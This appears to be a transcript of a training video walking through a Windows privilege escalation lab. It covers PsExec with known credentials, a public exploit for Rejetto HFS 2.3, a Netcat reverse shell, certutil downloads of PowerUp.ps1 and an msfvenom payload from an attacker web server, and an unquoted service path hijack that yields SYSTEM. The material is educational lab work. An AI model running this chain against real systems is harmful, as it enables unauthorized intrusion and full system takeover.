Privilege Escalation Walkthrough: Windows

Video Activity
Join over 3 million cybersecurity professionals advancing their career
Sign up with
Required fields are marked with an *
or

Already have an account? Sign In »

Time
21 hours 43 minutes
Difficulty
Intermediate
CEU/CPE
22
Video Transcription
00:00
>> Welcome to the privilege escalation lab walkthrough.
00:00
Buckle your seat belts because
00:00
we're going to be here for awhile.
00:00
The unintended exploitation path that I had hinted
00:00
at is using PsExec on the Windows box.
00:00
If we are able to figure out the username and password,
00:00
which you've seen before,
00:00
administrative password on the Windows box
00:00
and use IM packet PsExec.
00:00
You saw this in the slides that
00:00
I showed you about using PsExec.
00:00
But if I do this, who am I?
00:00
Well, I'm system. That's the easy way.
00:00
Now let's go to the intended exploitation path.
00:00
If we go, and I'd hinted it was
00:00
a web based exploitation path,
00:00
so if we go 192.168.119,
00:00
you'll notice HTTP file server.
00:00
That looks interesting. Also,
00:00
if you look at the link is rejetto HFS,
00:00
and we have a version at 2.3.
00:00
We can use search exploit for rejetto,
00:00
and we see we have a Python script here,
00:00
so you can do this on Metasploit or you can do it now,
00:00
I'm going to show you how to not do it on Metasploit
00:00
because we don't rely on Metasploit for OSEP.
00:00
What I will do is searchsploit M,
00:00
and I'm going to take a look at
00:00
this mouse pad, three, nine.
00:00
Again, we're looking at code,
00:00
we're reading the code.
00:00
We need to understand what we need to change here.
00:00
I see local IP and local port number.
00:00
Again, they put comments here which is very nice.
00:00
I need to put my box,
00:00
and whatever port I want my Netcat listener on it.
00:00
It will tell you your Netcat listener
00:00
needs to be on web server.
00:00
Well, why don't we just use our web server
00:00
and we can leave that off.
00:00
Let's make this 5555,
00:00
we'll make things a little different here.
00:00
But I'm going to use locate
00:00
Netcat.exe, and here's Netcat.
00:00
I'm going to put this or move this to
00:00
var/www/html. Also, copy,
00:00
might be the better way to go,
00:00
Copy.exe.
00:00
Now I need to start my server, system,
00:00
CTL, start Apache 2.
00:00
Now what I'm going to need to do,
00:00
I'm going to split this,
00:00
so my Netcat listener port 5555,
00:00
I'm going to try to run this script is specify
00:00
our Windows host 19, port 80.
00:00
There we go. Says you
00:00
mean you may need to run it a few times,
00:00
but now we are on user one's desktop.
00:00
Now what we want to do is escalate privileges,
00:00
>> who am I?
00:00
>> We're user, net users.
00:00
User 1. Are we an administrator? No, we're not.
00:00
What we want to do is,
00:00
I talked about the Power Apps Script,
00:00
so what I can do is locate Powerup.ps1,
00:00
and I see it here.,
00:00
so what I'm going to do is copy it right here.
00:00
I'm going to start my server,
00:00
http server, Python 3.
00:00
What I'm going to do is I need to use certutil o
00:00
download this URL cash F HTP
00:00
192.168.1.50:8000 Powerup.ps1.
00:00
We see that we got that.
00:00
We can check directory, we see that.
00:00
I need to go into PowerShell now.
00:00
What I'm going to do is import module,
00:00
Powerup.ps1 and invoke checks,
00:00
so it's checking,
00:00
checking for unquoted service path and it found it,
00:00
found some other things as well.
00:00
But let's take a look at unquoted service path.
00:00
We see we have temp unquoted path. Well that's a clue.
00:00
You guys saw this in the lesson.
00:00
If we make unquoted dot EXE
00:00
and if we can start or stop this service,
00:00
we can get a shell as system.
00:00
I'm not going to use Powerup.
00:00
I'm going to make my own thing here.
00:00
I will do MSF venom payload is Windows shell,
00:00
reverse TCP, L host is me.
00:00
L port 1234.
00:00
We're going to do format is executable and
00:00
we're going to do unquoted dot EXE.
00:00
Just waiting for this,
00:00
there we go, like that.
00:00
I want to use certuntil again,
00:00
but why don't I just change directories to temp.
00:00
Certutill,
00:00
can see that I am in the root directory for my user.
00:00
Root, that shell should be in here,
00:00
certutil- urlcache cash -F htp
00:00
192.168.1.50:8000/unquoted.exe/unquoted.exe, DIR.
00:00
Now, we can try to see if we can
00:00
start or stop this service.
00:00
The service name is unquoted service.
00:00
I'm going to get a PowerShell
00:00
and also start my listener.
00:00
1234 SC.
00:00
Start, access is denied,
00:00
so what do I do now?
00:00
I can try to shut down
00:00
this machine and restart it and see what happens.
00:00
If we restart this unquote.exe,
00:00
that should make our shell or activate our shell here.
00:00
But it might take awhile.
00:00
Because when we give the shutdown signal,
00:00
I think it gives it about a minute to shut down,
00:00
so we have to wait here patiently to get our shell.
00:00
We see the system has restarted here to kick this off.
00:00
Now again, we're waiting patiently to
00:00
see if we get a shell here.
00:00
There we go. Who am I?
00:00
Now we're system.
00:00
We have successfully gotten from user 1 to,
00:00
well, we don't even need that,
00:00
to system, so I can,
00:00
if you're an OSEP LAN,
00:00
you're going to change directory users,
00:00
change directory administrator,
00:00
change directory desktop,
00:00
and we see that there's a flag there, flag.txt.
00:00
There you go. There is your proof flag right there.
00:00
That's the Windows machine.
00:00
Both unintended and intent exploitation pass.
00:00
Now let's pivot over to the Linux box.
00:00
But what I'm going to do is make
00:00
>> another video for that.
00:00
>> If you want to go over the Windows machine, go ahead.
00:00
But this is part 1 for the Windows machine,
00:00
and I will make a part 2 for the Linux machine.
Up Next